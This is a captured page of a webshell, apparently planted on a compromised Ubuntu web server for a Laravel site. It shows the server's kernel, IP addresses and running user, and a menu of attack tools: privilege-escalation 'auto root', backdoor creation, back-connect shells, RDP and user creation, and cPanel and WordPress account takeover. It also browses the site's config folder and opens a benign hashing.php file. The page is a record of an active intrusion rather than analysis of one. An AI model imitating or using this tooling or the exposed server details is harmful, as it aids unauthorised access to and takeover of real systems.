Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 3.137.184.142
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
lionsclub /
core /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
app.php
9.84
KB
-rw-r--r--
auth.php
3.71
KB
-rw-r--r--
broadcasting.php
1.56
KB
-rw-r--r--
cache.php
3.03
KB
-rw-r--r--
captcha.php
154
B
-rw-r--r--
cors.php
823
B
-rw-r--r--
database.php
5
KB
-rw-r--r--
filesystems.php
2.63
KB
-rw-r--r--
fortify.php
3.04
KB
-rw-r--r--
geoip.php
4.78
KB
-rw-r--r--
hashing.php
1.53
KB
-rw-r--r--
installer.php
4.95
KB
-rw-r--r--
jetstream.php
1.03
KB
-rw-r--r--
logging.php
2.83
KB
-rw-r--r--
mail.php
3.29
KB
-rw-r--r--
queue.php
2.7
KB
-rw-r--r--
sanctum.php
1.59
KB
-rw-r--r--
services.php
2.01
KB
-rw-r--r--
session.php
6.88
KB
-rw-r--r--
translation-manager.php
1.43
KB
-rw-r--r--
view.php
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hashing.php
<?php return [ /* |-------------------------------------------------------------------------- | Default Hash Driver |-------------------------------------------------------------------------- | | This option controls the default hash driver that will be used to hash | passwords for your application. By default, the bcrypt algorithm is | used; however, you remain free to modify this option if you wish. | | Supported: "bcrypt", "argon", "argon2id" | */ 'driver' => 'bcrypt', /* |-------------------------------------------------------------------------- | Bcrypt Options |-------------------------------------------------------------------------- | | Here you may specify the configuration options that should be used when | passwords are hashed using the Bcrypt algorithm. This will allow you | to control the amount of time it takes to hash the given password. | */ 'bcrypt' => [ 'rounds' => env('BCRYPT_ROUNDS', 10), ], /* |-------------------------------------------------------------------------- | Argon Options |-------------------------------------------------------------------------- | | Here you may specify the configuration options that should be used when | passwords are hashed using the Argon algorithm. These will allow you | to control the amount of time it takes to hash the given password. | */ 'argon' => [ 'memory' => 1024, 'threads' => 2, 'time' => 2, ], ];
Close